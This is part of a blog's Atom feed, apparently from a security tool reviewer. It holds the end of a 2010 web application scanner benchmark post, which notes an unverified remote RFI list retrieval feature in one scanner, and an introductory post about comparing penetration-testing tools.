&lt;li&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: normal normal normal 7pt/normal &#39;Times New Roman&#39;;&quot;&gt;         &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;i&gt;VulnerabilityScanner Remote RFI List Retrieval&lt;/i&gt;&lt;/b&gt; (listed in the scanners that were &lt;b&gt;not&lt;/b&gt; tested, appendix A, developed by a group called RST, &lt;a href=&quot;http://pastebin.com/f3c267935&quot;&gt;http://pastebin.com/f3c267935&lt;/a&gt;) – In the source code of the tool VulnerabilityScanner (a python script), I found traces for remote access to external web sites for obtaining RFI lists (might be used to refer the user to external URLs listed in the list). I could not verify the purpose of this feature since I didn’t manage to activate the tool (yet); in theory, this could be a legitimate list update feature, but since all the lists the tool uses are hardcoded, I didn’t understand the purpose of the feature. Again, I’m &lt;b&gt;not&lt;/b&gt; jumping to any conclusions; this feature might be related to the tool’s initial design, which was not fully implemented due to various considerations. I’ll try and drill deeper in the next benchmark (and hopefully, manage to test the tool’s accuracy as well).&lt;/li&gt;
&lt;/ul&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Although I did &lt;b&gt;not&lt;/b&gt; verify that any of these features is malicious in nature, these features and behaviors might be abused to compromise the security of the tester’s workstation (or to incriminate him in malicious actions), and thus, require additional investigation to disqualify this possibility.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/div&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;&quot;&gt;&lt;/span&gt;</content><link rel='replies' type='application/atom+xml' href='http://sectooladdict.blogspot.com/feeds/7398976696397938525/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://sectooladdict.blogspot.com/2010/12/web-application-scanner-benchmark.html#comment-form' title='7 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3792178847867987053/posts/default/7398976696397938525'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3792178847867987053/posts/default/7398976696397938525'/><link rel='alternate' type='text/html' href='http://sectooladdict.blogspot.com/2010/12/web-application-scanner-benchmark.html' title='Web Application Scanner Benchmark (v1.0)'/><author><name>Shay Chen</name><uri>http://www.blogger.com/profile/16490521389991462247</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC9QLJKh4Z6I4puwxVoOzyuqVc4ZRYmL_XcS3dLCeIsRcdoEmwnZQejnW8__iitHgbTYcmCefW7UEtQPpZdbtqX0cnPCYn7Ws913obv19u44x89xHY8a-9JqfkdxyBXg/s220/n847114298_305931_3159.jpg'/></author><thr:total>7</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3792178847867987053.post-3801935075883843225</id><published>2010-04-16T05:18:00.000-07:00</published><updated>2010-06-06T06:51:33.778-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="benchmarking"/><category scheme="http://www.blogger.com/atom/ns#" term="security"/><category scheme="http://www.blogger.com/atom/ns#" term="security tools"/><title type='text'>Where to begin…</title><content type='html'>&lt;p class=&quot;MsoNormal&quot;&gt;There’s a ton of security tools out there.&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;From the point of view of security consultants (pen-testers to be exact), most of these tools are there to make their job easier, aid them in improving test results and enable them to reduce the time required to perform their tests.&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;But that’s not how it works in reality...&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;Lately there so much tools that it’s hard to know what to use;&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;Some of these tools are obsolete, some contain numerous bugs that prevents their execution from being effective, and some simply don’t justify the time required to execute them. On the other hand, some relatively anonymous tools generate spectacular results and can provide great benefits, but for some unknown reason (that has nothing to do with their quality), do not receive the credit and recognition they deserve.&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;After several years in the profession, and as an &lt;b&gt;official security tool addict&lt;/b&gt;, I have decided to invest some time in sharing my experiences from using these tools, and from time to time, publish &lt;b&gt;detailed &lt;/b&gt;benchmarking articles that compare between the various tools features, usability, accuracy, advantages and disadvantages.&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;In hopes that the community will benefit from this initiative, and in hopes that it will inspire the various tool vendors to compete and improve their tools,&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;Let the contest begin.&lt;/p&gt;</content><link rel='replies' type='application/atom+xml' href='http://sectooladdict.blogspot.com/feeds/3801935075883843225/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://sectooladdict.blogspot.com/2010/04/where-to-begin.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3792178847867987053/posts/default/3801935075883843225'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3792178847867987053/posts/default/3801935075883843225'/><link rel='alternate' type='text/html' href='http://sectooladdict.blogspot.com/2010/04/where-to-begin.html' title='Where to begin…'/><author><name>Shay Chen</name><uri>http://www.blogger.com/profile/16490521389991462247</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC9QLJKh4Z6I4puwxVoOzyuqVc4ZRYmL_XcS3dLCeIsRcdoEmwnZQejnW8__iitHgbTYcmCefW7UEtQPpZdbtqX0cnPCYn7Ws913obv19u44x89xHY8a-9JqfkdxyBXg/s220/n847114298_305931_3159.jpg'/></author><thr:total>0</thr:total></entry></feed>